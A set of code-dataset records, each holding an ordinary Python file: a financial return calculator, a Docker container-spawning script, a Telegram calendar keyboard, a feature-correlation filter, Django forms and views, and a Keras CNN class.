+{"seq_id": "3917194", "text": "from app import app, db\nfrom app.models import FinancialObject, FinancialObjectSchema, TSData, TSDataSchema\nfrom bokeh.io import output_file\nfrom bokeh.models import ColumnDataSource, LinearAxis, Range1d\nfrom bokeh.plotting import figure, show\nfrom config import basedir\nfrom calendar import leapdays, monthrange\nfrom datetime import datetime, timedelta\nimport flask\nimport json\nimport marshmallow as ma\nimport numpy as np\nimport pandas as pd\n\n\nts_hierarchy_file = open(basedir + '/ts_hierarchy.json')\nts_hierarchy = json.loads(ts_hierarchy_file.read())\n\n\nclass TSCalc(object):\n def __init__(self, foid, freq_code, start=None, end=None, benchmark=None, div_id_target=None):\n self.foid = foid\n self.freq_code = freq_code\n self.start: datetime = start\n self.end: datetime = end\n\n # self.level: pd.DataFrame = self.compute_ts_level(self.foid, self.freq_code)\n self.ts: pd.DataFrame = self.compute_ts_returns(self.foid, self.freq_code)\n self.cumulative: pd.DataFrame = self.compute_cumulative_return(self.ts)\n\n if not self.start:\n self.start = self.ts.index.min().to_pydatetime()\n if not self.end:\n self.end = self.ts.index.max().to_pydatetime()\n self.ts = self.ts[start:end]\n self.periodicity = None\n if freq_code == \"A\":\n self.periodicity = 1\n elif freq_code == \"Q\":\n self.periodicity = 4\n elif freq_code == \"M\":\n self.periodicity = 12\n self.calculate()\n\n def calculate(self):\n self.mtd_return = self.ts[self.ts.index.max()]\n self.qtd_return = np.product(self.ts[(self.find_previous_quarter_end(self.end) + timedelta(days=1)): self.end].apply(lambda x: x+1)) - 1\n self.ytd_return = np.product(self.ts[(self.find_previous_year_end(self.end) + timedelta(days=1)): self.end].apply(lambda x: x+1)) - 1\n # must compensate for leap years, handled below by constructing a datetime\n self.one_year_return = self.calculate_annualized_return(years=1)\n self.two_year_return = self.calculate_annualized_return(years=2)\n self.three_year_return = self.calculate_annualized_return(years=3)\n self.four_year_return = self.calculate_annualized_return(years=4)\n self.five_year_return = self.calculate_annualized_return(years=5)\n self.itd_annualized_return = self.cumulative[self.end.date().isoformat()] / self.cumulative[self.end.date().isoformat()] ** 365 / (self.end - self.start).days # Here begins time window returns (default ITD)\n self.itd_annualized_volatility = self.ts.std() * np.sqrt(self.periodicity)\n self.calendar_year_returns = {\n self.end.year: self.cumulative.loc[self.cumulative.index.max()] / self.cumulative.loc[datetime(self.end.year - 1, 12, 31).isoformat()] - 1,\n self.end.year - 1: self.calculate_calendar_year_return(self.end.year - 1),\n self.end.year - 2: self.calculate_calendar_year_return(self.end.year - 2),\n self.end.year - 3: self.calculate_calendar_year_return(self.end.year - 3),\n self.end.year - 4: self.calculate_calendar_year_return(self.end.year - 4),\n self.end.year - 5: self.calculate_calendar_year_return(self.end.year - 5),\n self.end.year - 6: self.calculate_calendar_year_return(self.end.year - 6),\n self.end.year - 7: self.calculate_calendar_year_return(self.end.year - 7),\n self.end.year - 8: self.calculate_calendar_year_return(self.end.year - 8),\n self.end.year - 9: self.calculate_calendar_year_return(self.end.year - 9),\n self.end.year - 10: self.calculate_calendar_year_return(self.end.year - 10),\n }\n # self.bokeh_ts_level_plot = self.generate_bokeh_ts_level_plot()\n self.bokeh_return_plot = 
self.generate_bokeh_return_plot()\n\n\n @staticmethod\n def compute_ts_level(foid, start=None, end=None):\n \"\"\"return a time series of levls of ts data (appropriate for graphing economic indicators and growth of a\n dollar return charts \"\"\"\n all_tsi_fo = TSData.query.filter(TSData.foid == foid)\n df = pd.read_sql(all_tsi_fo.statement, all_tsi_fo.session.bind)\n sources = set([source for source in df['source']])\n first = df.dt.min()\n last = df.dt.max()\n df['rank'] = df.apply(lambda x: ts_hierarchy[x['source']], axis=1)\n #df.groupby('dt').filter(lambda x: df['rank'])\n df['best'] = df.groupby('dt')['rank'].transform(lambda x: x.min())\n df = df[\n df['rank'] == df['best']\n ]\n df.set_index('dt', inplace=True)\n if not start:\n start = df.index.min()\n if not end:\n end = df.index.max()\n df.dropna()\n return df['level'][start:end]\n\n @staticmethod\n def compute_ts_returns(foid, freq_code, start=None, end=None):\n \"\"\"\"return a time series of returns, with resampling for periodicity\"\"\"\n all_tsi_fo = TSData.query.filter(TSData.foid == foid)\n df = pd.read_sql(all_tsi_fo.statement, all_tsi_fo.session.bind)\n df['rank'] = df.apply(lambda x: ts_hierarchy[x['source']], axis=1)\n returns = df.pivot(index='dt', columns='rank', values='level').resample(freq_code).ffill() \\\n .pct_change().reset_index().melt(id_vars='dt')\n returns['best'] = df.groupby('dt')['rank'].transform(lambda x: x.min())\n returns = returns[\n returns['rank'] == returns['best']\n ]\n returns.set_index('dt', inplace=True)\n returns.drop(['rank', 'best'], axis=1, inplace=True)\n print(returns.columns)\n returns.columns = ['returns']\n if not start:\n start = returns.index.min()\n if not end:\n end = returns.index.max()\n df.dropna()\n return returns['returns'][start:end]\n\n @staticmethod\n def find_previous_quarter_end(dt: datetime):\n if dt.month < 3:\n return datetime(dt.year - 1, 12, 31)\n elif dt.month < 6:\n return datetime(dt.year, 3, 31)\n elif dt.month < 9:\n return datetime(dt.year, 6, 30)\n else:\n return datetime(dt.year, 9, 30)\n\n @staticmethod\n def find_previous_year_end(dt: datetime):\n return datetime(dt.year - 1, 12, 31)\n\n @staticmethod\n def compute_cumulative_return(ts):\n \"\"\"Makes cumulative return timeseries from returns; expects a NaN at beginning, countermeasures pending\"\"\"\n cumulative = ts.apply(lambda x: x + 1)\n cumulative.iloc[0] = 1\n cumulative = cumulative.cumprod()\n return cumulative\n\n def calculate_annualized_return(self, years:int):\n indexable_denominator = self.end.replace(self.end.year - years, self.end.month, monthrange(self.end.year - years, self.end.month)[1]).date().isoformat()\n ret = self.cumulative[self.end.date().isoformat()] / self.cumulative[indexable_denominator]\n return ret ** (365 / (365 * years)) - 1\n\n def calculate_calendar_year_return(self, year: int):\n return self.cumulative.loc[datetime(year, 12, 31).date().isoformat()] / \\\n self.cumulative.loc[datetime(year - 1, 12, 31).date().isoformat()] - 1\n\n def generate_bokeh_ts_level_plot(self):\n p = figure(x_axis_type=\"datetime\")\n p.line(self.level.index.values, self.level.values)\n\n def generate_bokeh_return_plot(self):\n p = figure(x_axis_type=\"datetime\")\n p.line(self.cumulative.index.values, self.cumulative.values)\n p.extra_y_ranges = {\"returns\": Range1d()}\n p.add_layout(LinearAxis(y_range_name=\"returns\", ), \"right\")\n p.vbar(x=self.ts.dropna().index.values, top=self.ts.dropna().values, width=1, y_range_name=\"returns\")\n return json.dumps(p, 
target=self.div_id_target)\n\n\nclass TSCalcSchema(ma.Schema):\n \"\"\"Serialize calculations for a time series\"\"\"\n class Meta:\n fields = (\"foid\", \"mtd_return\", \"qtd_return\", \"ytd_return\", \"one_year_return\", \"two_year_return\", \"three_year_return\", \\\n \"four_year_return\", \"five_year_return\", \"calendar_year_returns\", \"itd_annualized_return\", \"itd_annualized_volatility\")\n", "sub_path": "app/quant.py", "file_name": "quant.py", "file_ext": "py", "file_size_in_byte": 8178, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "config.basedir", "line_number": 16, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.product", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.TSData.query.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "app.models.TSData.query", "line_number": 78, "usage_type": "attribute"}, {"api_name": "app.models.TSData", "line_number": 78, "usage_type": "name"}, {"api_name": "app.models.TSData.foid", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 79, "usage_type": "call"}, {"api_name": "app.models.TSData.query.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "app.models.TSData.query", "line_number": 100, "usage_type": "attribute"}, {"api_name": "app.models.TSData", "line_number": 100, "usage_type": "name"}, {"api_name": "app.models.TSData.foid", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 121, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "call"}, {"api_name": "calendar.monthrange", "line_number": 144, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 153, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 157, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 159, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 160, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 162, "usage_type": "call"}, {"api_name": "marshmallow.Schema", 
"line_number": 165, "usage_type": "attribute"}]}
+{"seq_id": "38610394", "text": "#!/usr/bin/python\nimport argparse\nimport os\nfrom multiprocessing import Queue, Pool\nimport multiprocessing\nimport time\ndef execute_command (cmd):\n\n output = os.popen(cmd).read()\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Create or delete VCH.')\n parser.add_argument(\"-c\", \"--vchCount\", help= \"number of VCH\", required=True)\n parser.add_argument(\"-s\", \"--startIp\", help= \"Starting IP of VCH\", required=True)\n parser.add_argument(\"-x\", \"--cCount\", help= \"number of containers\", required=True)\n\n args = vars ( parser.parse_args())\n\n\n startIp = args['startIp']\n vchCount = int(args['vchCount'])\n contCount = int(args['cCount'])\n octets = startIp.split('.')\n\n lastOctet = int(octets[3])\n print(lastOctet)\n dockerRunCommands = []\n\n for i in range (lastOctet, lastOctet + vchCount + 1):\n #p = multiprocessing.Pool(contCount + 1)\n #dockerRunCommands = []\n for k in range (contCount):\n dockerRunCommands.append(\"docker -H \" + '.'.join(octets[0:3]) + '.' + str(i) + \":2376 --tls run -itd --label app.name=photon photon\")\n #p.map(execute_command, dockerRunCommands)\n #p.close()\n #p.join()\n #print(dockerRunCommands)\n\n p = multiprocessing.Pool(50)\n p.map(execute_command, dockerRunCommands)\n p.close()\n p.join()\n\n\nif __name__==\"__main__\":\n main()\n", "sub_path": "VicOnJenkins/NSXV/spawnContainers.py", "file_name": "spawnContainers.py", "file_ext": "py", "file_size_in_byte": 1368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.popen", "line_number": 9, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "344079073", "text": "import calendar\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.utils.callback_data import CallbackData\nfrom aiogram.utils.callback_data import CallbackData\n\ncalendar_cb = CallbackData('day_cb', 'day', 'month', 'year', 'action')\n\ndef generate_calendar(year: int, month: int):\n if month < 1 or month > 12:\n return []\n markup = InlineKeyboardMarkup()\n \n for week in calendar.monthcalendar(year, month):\n markup.row(*[InlineKeyboardButton(day if day!=0 else '⚪️', callback_data=calendar_cb.new(day = day, month=month, year=year, action = \"select_day\")) for day in week])\n \n l = []\n if month == 1:\n l.append(InlineKeyboardButton(\"Back\", callback_data=calendar_cb.new(day = 0, month = 12, year = year - 1, action = \"change\")))\n else:\n l.append(InlineKeyboardButton(\"Back\", callback_data=calendar_cb.new(day = 0, month = month - 1, year = year, action = \"change\")))\n if month == 12:\n l.append(InlineKeyboardButton(\"Next\", callback_data=calendar_cb.new(day = 0, month = 1, year = year+1, action = \"change\")))\n else:\n l.append(InlineKeyboardButton(\"Next\", callback_data=calendar_cb.new(day = 0, month = month + 1, year = year, action = \"change\")))\n markup.row(*l)\n return markup", "sub_path": "plugins/broadcasting/calendar_keyboard.py", "file_name": "calendar_keyboard.py", "file_ext": "py", "file_size_in_byte": 1286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "aiogram.utils.callback_data.CallbackData", "line_number": 6, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardMarkup", "line_number": 11, "usage_type": "call"}, {"api_name": "calendar.monthcalendar", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 14, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 18, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 20, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 22, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "227919633", "text": "import pandas as pd\nimport dask.dataframe as dd\nimport numpy as np\nfrom monitoring.time_it import timing\n\n\n#function takes Dask Dataframe as input and removes Features with correlation >= correlation_coefficient\n@timing\ndef remove_correlated_features(df, correlation_coefficient=1, dask=True):\n #reduce dataframe by not consider global timestamp and errorCodes\n df_reduced = df.select_dtypes(include='number')\n drop_errorcode_col = [col for col in df_reduced.columns if 'errorCode' in col]\n df_reduced = df_reduced.drop(columns=drop_errorcode_col)\n\n #create correlation matrix and determine columns to drop\n corr_matrix = df_reduced.corr().abs()\n if dask:\n corr_matrix = corr_matrix.compute()\n\n upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool))\n to_drop = [column for column in upper.columns if any(upper[column] >= correlation_coefficient)]\n print('Number of columns to drop: ' + str(len(to_drop)))\n\n df = df.drop(columns=to_drop)\n return df", "sub_path": "code/data_cleansing/remove_correlated_features.py", "file_name": "remove_correlated_features.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dask.dataframe", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.triu", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 20, "usage_type": "attribute"}, {"api_name": "monitoring.time_it.timing", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "372381297", "text": "from django import forms\nfrom .models import *\nfrom django.core.exceptions import ValidationError\n\ndef weight_validate(value):\n\tif not str(value).isdigit():\n\t\traise ValidationError('请输入正确的重量')\n'''\nclass ProductForm(forms.Form):\n\n\tname = forms.CharField(max_length=20, label='名字', widget=forms.widgets.TextInput(attrs={'class':'c1'}), \n\t\terror_messages={'required':'名字不能为空'},)\n\tweight = forms.CharField(max_length=50, label='重量', validators = [weight_validate])\n\tsize = forms.CharField(max_length=20, label='尺寸')\n\tchoice_list = [(i+1, v['type_name']) for i, v in enumerate(Type.objects.values('type_name'))]\n\ttype = forms.ChoiceField(label='产品类型', choices = choice_list, widget = forms.widgets.Select(attrs = {'class':'type', 'size':'4'}))\n'''\nclass ProductModelForm(forms.ModelForm):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(ProductModelForm, self).__init__(*args, **kwargs)\n\t\tchoices_list = [(i+1, v['type_name']) for i, v in enumerate(Type.objects.values('type_name'))]\n\t\tself.fields['type'].choices = choices_list\n\t\tself.fields['name'].initial = '我的手机'\n\n\tproductId = forms.CharField(max_length=20, label = '产品序号')\n\n\tclass Meta:\n\t\tmodel = Product\n\t\t#choice_list = [(i+1, v['type_name']) for i, v in enumerate(Type.objects.values('type_name'))]\n\n\t\tfields = ['name','weight','size','type']\n\t\texclude = []\n\t\tlabels = {\n\t\t\t'name':'产品名称',\n\t\t\t'weight':'重量',\n\t\t\t'size':'尺寸',\n\t\t\t'type':'产品类型'\n\t\t\t\t\t}\n\t\twidgets = {\n\t\t\t'name':forms.widgets.TextInput(attrs={'class':'c1'}),\n\t\t}\n\t\tfield_classes = {\n\t\t\t'name':forms.CharField,\n\t\t\t#'type':forms.ChoiceField(choices = choice_list)\n\t\t}\n\t\thelp_text = {\n\t\t\t'name':''\n\t\t}\n\n\t\terror_messages = {\n\t\t\t'__all__':{'required':'请输入内容',\n\t\t\t\t\t\t'invalid':'请检查输入内容'},\n\t\t\t'weight':{'required':'请输入内容',\n\t\t\t\t\t\t'invalid':'请检查输入内容'}\n\t\t}\n\n\tdef clean_weight(self):\n\t\tdata = self.cleaned_data['weight']\n\t\treturn data+'g'\n", "sub_path": "formthef/formthis/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1976, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.core.exceptions.ValidationError", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}, {"api_name": "django.forms.widgets.TextInput", "line_number": 41, "usage_type": "call"}, {"api_name": "django.forms.widgets", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 41, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 44, "usage_type": "name"}]}
+{"seq_id": "234552367", "text": "\"\"\"\n A python class to create the convolutional neural network\n which will be used to establish what type of box is being.\n This class inherit from the keras.Sequential model and also has functions which process and regularize the images\n@author Ian Gomez imgomez0127@github\n\"\"\"\nfrom functools import reduce\nfrom math import ceil\nimport os\nimport time\nimport numpy as np\nimport pandas\nfrom PIL import Image\nfrom tensorflow import keras,convert_to_tensor,split,map_fn,stack\nfrom tensorflow import shape as tfshape\nfrom tensorflow.data import Dataset\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten,Reshape,BatchNormalization,Input\nfrom sklearn.utils import shuffle\nfrom ImageProcessor import ImageProcessor \nfrom ImageScraper import ImageScraper\n\nclass ConvNet(keras.Sequential):\n def __init__(self, boxname, convLayerAmt, denseLayersAmt,modelDir=\"models/\"):\n super().__init__()\n self._boxname = boxname\n self._convLayerAmt = convLayerAmt \n self._denseLayersAmt = denseLayersAmt\n self._filePath = \"./\" + self._boxname + \"Examples\" \n self._imageLabels = self._classifyImages()\n self._images = self._processImages() \n self._imageShape = self._images[0].shape\n self._kernelSize = 3\n self._kernelChannels = 3\n self._poolingSize = 2\n if(not os.path.isdir(modelDir)):\n raise OSError(\"The input directory \" + str(newDir) +\" directory does not exist\")\n self._modelDir = modelDir\n\n @property\n def boxname(self):\n #Name of the box which the ConvNet will predict for\n return self._boxname\n \n @property\n def convLayerAmt(self):\n #Amount of Convolution Layers\n return self._convLayerAmt\n\n @convLayerAmt.setter\n def convLayerAmt(self,convLayerAmt):\n if(type(convLayerAmt) != int):\n raise ValueError(\"ConvLayerAmt is not of type int\")\n self._convLayerAmt = convLayerAmt\n \n @property\n def denseLayersAmt(self):\n #Amount of Dense Layers\n return self._denseLayersAmt\n \n @denseLayersAmt.setter\n def denseLayersAmt(self,denseLayersAmt):\n self._denseLayersAmt = denseLayersAmt\n \n @property\n def imageShape(self):\n return self._imageShape\n \n @imageShape.setter\n def imageShape(self,imageShape):\n self._imageShape = imageShape \n\n @property\n def filePath(self):\n #File path for the images\n return self._filePath\n \n @property\n def images(self):\n #A numpy array of images\n return self._images \n\n @property\n def kernelSize(self):\n #Size of the convolutional kernel\n return self._kernelSize\n \n @kernelSize.setter\n def kernelSize(self,kernelSize):\n if(type(kernelSize) != int):\n raise ValueError(\"The input kernelSize is not an int\") \n self._kernelSize == kernelSize\n \n @property\n def kernelChannels(self):\n #The amount of kernels that will be run over the image per convolutional layer\n return self._kernelChannels\n \n @kernelChannels.setter\n def kernelChannels(self,kernelChannels):\n if(type(kernelChannels) != int):\n raise ValueError(\"The inputted kernelChannels is not of type int\")\n self._kernelChannels = kernelChannels\n\n @property\n def poolingSize(self):\n return self._poolingSize\n \n @poolingSize.setter\n def poolingSize(self,poolingSize):\n if(type(poolingSize) != int):\n raise ValueError(\"The inputted poolingSize is not of type int\")\n self._poolingSize = poolingSize\n\n @property\n def imageLabels(self):\n return self._imageLabels\n\n @property\n def modelDir(self):\n #Directory for the model\n return self._modelDir\n\n @modelDir.setter\n def modelDir(self,newDir):\n if(not 
os.path.isdir(newDir)):\n raise OSError(\"The input directory \" + str(newDir) +\n \" directory does not exist\")\n self._modelDir = newDir\n\n @property\n def modelPath(self):\n #Path of the model h5 file\n return self.modelDir+self.boxname+\".h5\" \n\n def _processImages(self):\n \"\"\"\n Returns:\n processedImages(np.array[float64]): Array of images represented as matrices\n This function processes and returns the images in the folder \n that holds the examples for the box specified by self._boxname\n \"\"\"\n processor = ImageProcessor(self._filePath) \n processedImages = processor.processFolderImages()\n if(len(processedImages) == 0):\n raise ValueError(\"There are no images in that folder\")\n return processedImages \n\n def _classifyImages(self):\n \"\"\"\n This function classifies the images in the folder that \n holds the examples for the box specifed by self._boxname\n \"\"\"\n processor = ImageProcessor(self._filePath)\n labels = processor.classifyImages()\n if(len(labels) == 0):\n raise ValueError(\"There are no images in that folder\")\n return labels\n\n def BuildConvNet(self):\n self.add(Input(shape=self._imageShape))\n for i in range(self._convLayerAmt):\n self.add(Conv2D(self._kernelChannels,self._kernelSize,\n padding=\"Valid\"))\n self.add(MaxPooling2D(self._poolingSize))\n self.add(Flatten())\n for i in range(self._denseLayersAmt):\n self.add(Dense(100,activation = \"relu\",use_bias=True))\n self.add(Dense(1,activation=\"sigmoid\"))\n return self.layers\n \n def save(self):\n super().save(self.modelPath)\n\n def grabRegionAsTensor(self,OS): \n scraper = ImageScraper(self._boxname,OS)\n return ImageProcessor.toImageTensor(scraper.grabScreenRegion())\n\n def load_weights(self):\n if(not os.path.exists(self.modelPath)):\n raise OSError(\"The model does not exist\") \n super().load_weights(self.modelPath)\n \n def regularizeImages(self,images):\n return images/255\n\n def train(self):\n trainingImages = np.asarray(self.regularizeImages(self._images))\n trainingLabels = np.asarray(self._imageLabels)\n imageBatches = np.array_split(trainingImages,ceil(trainingImages.shape[0]/10))\n labelBatches = np.array_split(trainingLabels,ceil(trainingLabels.shape[0]/10))\n self.compile(\n optimizer = keras.optimizers.Adam(lr=.001),\n loss=\"binary_crossentropy\",metrics=[\"accuracy\"])\n for images,labels in list(zip(imageBatches,labelBatches)):\n self.fit(\n images,\n labels,\n epochs=100,\n batch_size=trainingLabels.shape[0],\n validation_split=0.2)\n \nif __name__ == \"__main__\": \n testModel = ConvNet(\"autobox\",3,6)\n testModel.BuildConvNet()\n testModel.train()\n testModel.save()\n predictions = testModel.predict(testModel.images)\n print(predictions)\n print(reduce(lambda x,y: x and y,[round(x[0]) for x in predictions] == np.asarray(testModel.imageLabels)))\n print(testModel.imageLabels)\n testModel.summary()\n", "sub_path": "ConvNet.py", "file_name": "ConvNet.py", "file_ext": "py", "file_size_in_byte": 7248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tensorflow.keras.Sequential", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": 
"ImageProcessor.ImageProcessor", "line_number": 142, "usage_type": "call"}, {"api_name": "ImageProcessor.ImageProcessor", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 162, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 164, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 168, "usage_type": "call"}, {"api_name": "ImageScraper.ImageScraper", "line_number": 175, "usage_type": "call"}, {"api_name": "ImageProcessor.ImageProcessor.toImageTensor", "line_number": 176, "usage_type": "call"}, {"api_name": "ImageProcessor.ImageProcessor", "line_number": 176, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 189, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 190, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 190, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 192, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 192, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}]}
+{"seq_id": "355728856", "text": "from django import forms\nfrom .models import Stock\n\nclass StockCreateForm(forms.ModelForm):\n class Meta:\n model = Stock\n fields = ['category', 'item_name', 'quantity','location']\n def clean_category(self):\n category=self.cleaned_data.get('category')\n if not category:\n raise forms.ValidationError('this field is required')\n\n #for instance in Stock.objects.all():\n # if instance.category == category:\n # raise forms.ValidationError(str(category) + ' is already created')\n\t\t\n return category\n\n def clean_item_name(self):\n item_name=self.cleaned_data.get('item_name')\n if not item_name:\n raise forms.ValidationError('this field is required')\n\n return item_name\n\n def clean_location(self):\n location=self.cleaned_data.get('location')\n if not location:\n raise forms.ValidationError('This field is required')\n return location\n\nclass StockSearchForm(forms.ModelForm):\n class Meta:\n model = Stock\n fields = ['category', 'item_name']\n\nclass StockUpdateForm(forms.ModelForm):\n class Meta:\n model=Stock\n fields=['category','item_name','quantity','location']\n\n \n\n\n", "sub_path": "inventory/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "models.Stock", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 22, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Stock", "line_number": 34, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Stock", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "477548011", "text": "from django.shortcuts import render , redirect\nfrom ..forms import candidateRegForm , EditProfileForm , EditCandidateProfile\nfrom ..models import User , Candidate\nfrom django.views.generic import CreateView , UpdateView\n\n# from django.contrib.auth import authenticate , login , logout\n\n\nclass candidateReg(CreateView):\n model = User\n form_class = candidateRegForm\n template_name = 'candidateReg.html'\n\n def get_context_data(self , **kwargs):\n kwargs['user_type'] = 'candidate'\n return super().get_context_data(**kwargs)\n \n def form_valid(self , form):\n user = form.save()\n return redirect('account:login') \n # return redirect('account:home')\n\n\ndef candidateUpdate(request):\n if request.method == 'POST':\n u_form = EditProfileForm(request.POST , instance = request.user)\n c_form = EditCandidateProfile(request.POST, instance = request.user.candidate)\n if u_form.is_valid() and c_form.is_valid():\n u_form.save()\n c_form.save()\n return redirect('account:candidate_dash')\n else:\n u_form = EditProfileForm(instance = request.user)\n c_form = EditCandidateProfile(instance = request.user.candidate)\n \n context = {\n 'u_form' : u_form,\n 'c_form' : c_form\n }\n \n return render(request , 'userUpdateProfile.html' , context)\n\n", "sub_path": "NewIntense/account/views/candidateViwe.py", "file_name": "candidateViwe.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.views.generic.CreateView", "line_number": 9, "usage_type": "name"}, {"api_name": "models.User", "line_number": 10, "usage_type": "name"}, {"api_name": "forms.candidateRegForm", "line_number": 11, "usage_type": "name"}, {"api_name": 